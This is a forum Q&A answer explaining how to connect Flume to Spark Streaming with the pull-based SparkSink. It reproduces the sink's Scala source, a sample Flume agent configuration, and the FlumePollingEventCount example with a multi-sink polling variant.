Can Spark Streaming results be aggregated directly through Flume?

2025-03-05 11:23:24
Recommended answers (1)
Answer (1):

First, compile the code below into a jar and put it on the Flume agent's classpath; the code is taken from the Spark source tree (if it complains about missing helper classes such as Logging or SparkAvroCallbackHandler, they live in Scala files in the same source directory). A sample Flume agent configuration is sketched after the code.
package org.apache.spark.streaming.flume.sink

import java.net.InetSocketAddress
import java.util.concurrent._

import org.apache.avro.ipc.NettyServer
import org.apache.avro.ipc.specific.SpecificResponder
import org.apache.flume.Context
import org.apache.flume.Sink.Status
import org.apache.flume.conf.{Configurable, ConfigurationException}
import org.apache.flume.sink.AbstractSink

/**
 * A sink that uses Avro RPC to run a server that can be polled by Spark's
 * FlumePollingInputDStream. This sink has the following configuration parameters:
 *
 *   hostname - The hostname to bind to. Default: 0.0.0.0
 *   port - The port to bind to. (No default - mandatory)
 *   timeout - Time in seconds after which a transaction is rolled back,
 *   if an ACK is not received from Spark within that time
 *   threads - Number of threads to use to receive requests from Spark (Default: 10)
 *
 * This sink is unlike other Flume sinks in the sense that it does not push data,
 * instead the process method in this sink simply blocks the SinkRunner the first time it is
 * called. This sink starts up an Avro IPC server that uses the SparkFlumeProtocol.
 *
 * Each time a getEventBatch call comes, it creates a transaction and reads events
 * from the channel. When enough events are read, the events are sent to the Spark receiver and
 * the thread itself is blocked and a reference to it saved off.
 *
 * When the ack for that batch is received,
 * the thread which created the transaction is retrieved and it commits the transaction with the
 * channel from the same thread it was originally created in (since Flume transactions are
 * thread local). If a nack is received instead, the sink rolls back the transaction. If no ack
 * is received within the specified timeout, the transaction is rolled back too. If an ack comes
 * after that, it is simply ignored and the events get re-sent.
 *
 */

class SparkSink extends AbstractSink with Logging with Configurable {

  // Size of the pool to use for holding transaction processors.
  private var poolSize: Integer = SparkSinkConfig.DEFAULT_THREADS

  // Timeout for each transaction. If spark does not respond in this much time,
  // rollback the transaction
  private var transactionTimeout = SparkSinkConfig.DEFAULT_TRANSACTION_TIMEOUT

  // Address info to bind on
  private var hostname: String = SparkSinkConfig.DEFAULT_HOSTNAME
  private var port: Int = 0

  private var backOffInterval: Int = 200

  // Handle to the server
  private var serverOpt: Option[NettyServer] = None

  // The handler that handles the callback from Avro
  private var handler: Option[SparkAvroCallbackHandler] = None

  // Latch that blocks off the Flume framework from wasting 1 thread.
  private val blockingLatch = new CountDownLatch(1)

  override def start() {
    logInfo("Starting Spark Sink: " + getName + " on port: " + port + " and interface: " +
      hostname + " with " + "pool size: " + poolSize + " and transaction timeout: " +
      transactionTimeout + ".")
    handler = Option(new SparkAvroCallbackHandler(poolSize, getChannel, transactionTimeout,
      backOffInterval))
    val responder = new SpecificResponder(classOf[SparkFlumeProtocol], handler.get)
    // Using the constructor that takes specific thread-pools requires bringing in netty
    // dependencies which are being excluded in the build. In practice,
    // Netty dependencies are already available on the JVM as Flume would have pulled them in.
    serverOpt = Option(new NettyServer(responder, new InetSocketAddress(hostname, port)))
    serverOpt.foreach(server => {
      logInfo("Starting Avro server for sink: " + getName)
      server.start()
    })
    super.start()
  }

  override def stop() {
    logInfo("Stopping Spark Sink: " + getName)
    handler.foreach(callbackHandler => {
      callbackHandler.shutdown()
    })
    serverOpt.foreach(server => {
      logInfo("Stopping Avro Server for sink: " + getName)
      server.close()
      server.join()
    })
    blockingLatch.countDown()
    super.stop()
  }

  override def configure(ctx: Context) {
    import SparkSinkConfig._
    hostname = ctx.getString(CONF_HOSTNAME, DEFAULT_HOSTNAME)
    port = Option(ctx.getInteger(CONF_PORT)).
      getOrElse(throw new ConfigurationException("The port to bind to must be specified"))
    poolSize = ctx.getInteger(THREADS, DEFAULT_THREADS)
    transactionTimeout = ctx.getInteger(CONF_TRANSACTION_TIMEOUT, DEFAULT_TRANSACTION_TIMEOUT)
    backOffInterval = ctx.getInteger(CONF_BACKOFF_INTERVAL, DEFAULT_BACKOFF_INTERVAL)
    logInfo("Configured Spark Sink with hostname: " + hostname + ", port: " + port + ", " +
      "poolSize: " + poolSize + ", transactionTimeout: " + transactionTimeout + ", " +
      "backoffInterval: " + backOffInterval)
  }

  override def process(): Status = {
    // This method is called in a loop by the Flume framework - block it until the sink is
    // stopped to save CPU resources. The sink runner will interrupt this thread when the sink is
    // being shut down.
    logInfo("Blocking Sink Runner, sink will continue to run..")
    blockingLatch.await()
    Status.BACKOFF
  }

  private[flume] def getPort(): Int = {
    serverOpt
      .map(_.getPort)
      .getOrElse(
        throw new RuntimeException("Server was not started!")
      )
  }

  /**
   * Pass in a [[CountDownLatch]] for testing purposes. This latch is counted down when each
   * batch is received. The test can simply call await on this latch till the expected number of
   * batches are received.
   * @param latch
   */
  private[flume] def countdownWhenBatchReceived(latch: CountDownLatch) {
    handler.foreach(_.countDownWhenBatchAcked(latch))
  }
}

/**
 * Configuration parameters and their defaults.
 */
private[flume]
object SparkSinkConfig {
  val THREADS = "threads"
  val DEFAULT_THREADS = 10

  val CONF_TRANSACTION_TIMEOUT = "timeout"
  val DEFAULT_TRANSACTION_TIMEOUT = 60

  val CONF_HOSTNAME = "hostname"
  val DEFAULT_HOSTNAME = "0.0.0.0"

  val CONF_PORT = "port"

  val CONF_BACKOFF_INTERVAL = "backoffInterval"
  val DEFAULT_BACKOFF_INTERVAL = 200
}
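
Once the jar (plus the Avro and scala-library jars it depends on) is on the Flume agent's classpath, the sink can be declared in the agent configuration. Below is a minimal sketch; the agent name, channel name, and port are placeholder values, and the source feeding the channel is omitted. Only hostname, port, and channel are required by the sink itself; threads, timeout, and backoffInterval are the optional keys defined in SparkSinkConfig above.

# Hypothetical agent with a memory channel feeding the Spark sink
agent.channels = memoryChannel
agent.sinks = spark

agent.channels.memoryChannel.type = memory
agent.channels.memoryChannel.capacity = 10000

# Fully qualified name of the sink class compiled above
agent.sinks.spark.type = org.apache.spark.streaming.flume.sink.SparkSink
agent.sinks.spark.hostname = 0.0.0.0
agent.sinks.spark.port = 9999
agent.sinks.spark.channel = memoryChannel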
  
Then, in your Spark Streaming application, use code like the following:
package org.apache.spark.examples.streaming
import org.apache.spark.SparkConf
import org.apache.spark.storage.StorageLevel
import org.apache.spark.streaming._
import org.apache.spark.streaming.flume._
import org.apache.spark.util.IntParam
import java.net.InetSocketAddress

/**
 * Produces a count of events received from Flume.
 *
 * This should be used in conjunction with the Spark Sink running in a Flume agent. See
 * the Spark Streaming programming guide for more details.
 *
 * Usage: FlumePollingEventCount <host> <port>
 * `host` is the host on which the Spark Sink is running.
 * `port` is the port at which the Spark Sink is listening.
 *
 * To run this example:
 * `$ bin/run-example org.apache.spark.examples.streaming.FlumePollingEventCount [host] [port]`
 */
object FlumePollingEventCount {
  def main(args: Array[String]) {
    if (args.length < 2) {
      System.err.println(
        "Usage: FlumePollingEventCount <host> <port>")
      System.exit(1)
    }

    StreamingExamples.setStreamingLogLevels()

    val Array(host, IntParam(port)) = args

    val batchInterval = Milliseconds(2000)

    // Create the context and set the batch size
    val sparkConf = new SparkConf().setAppName("FlumePollingEventCount")
    val ssc = new StreamingContext(sparkConf, batchInterval)

    // Create a flume stream that polls the Spark Sink running in a Flume agent
    val stream = FlumeUtils.createPollingStream(ssc, host, port)

    // Print out the count of events received from this server in each batch
    stream.count().map(cnt => "Received " + cnt + " flume events.").print()

    ssc.start()
    ssc.awaitTermination()
  }
}
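
If events have to be pulled from more than one Spark Sink, FlumeUtils.createPollingStream also has an overload that takes a sequence of addresses and a storage level (which is why the example already imports java.net.InetSocketAddress and StorageLevel). A rough sketch, to be used inside main() in place of the single-host call above; the host names and port are placeholders:

    // Placeholder addresses of two Flume agents, each running the SparkSink configured above
    val addresses = Seq(
      new InetSocketAddress("flume-host-1", 9999),
      new InetSocketAddress("flume-host-2", 9999))

    // One input DStream polls all of the sinks; received events are stored
    // with the given storage level
    val multiStream = FlumeUtils.createPollingStream(
      ssc, addresses, StorageLevel.MEMORY_AND_DISK_SER_2)

    multiStream.count().map(cnt => "Received " + cnt + " flume events.").print()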
